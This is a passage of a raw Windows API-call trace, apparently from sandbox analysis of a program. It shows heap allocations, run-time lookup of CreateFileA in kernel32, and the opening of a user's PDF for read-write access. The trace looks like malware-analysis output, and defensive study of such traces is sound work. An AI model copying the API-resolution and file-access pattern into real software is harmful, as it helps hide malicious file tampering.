lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0173.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0173.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0173.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0173.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0173.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0173.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0173.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0173.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.431] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0173.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0173.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0173.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.434] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0173.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9a90 [0173.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9a90, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0173.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.435] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0173.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0173.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0173.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9a90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0173.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.435] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0173.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0173.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0173.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0173.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0173.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa5f008 [0173.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0173.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x45) returned 0x9aa4f8 [0173.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf", cchWideChar=69, lpMultiByteStr=0x9aa4f8, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf", lpUsedDefaultChar=0x0) returned 69 [0173.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0173.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0173.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.437] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\xjtjup63.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0173.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0173.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0173.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=69, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8a) returned 0x8edfa0 [0173.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=69, lpWideCharStr=0x8edfa0, cchWideChar=69 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf") returned 69 [0173.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0173.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0173.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0173.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0173.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0173.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0173.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0173.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0173.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0173.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0173.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0173.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0173.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0173.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0173.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0173.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0173.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.442] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 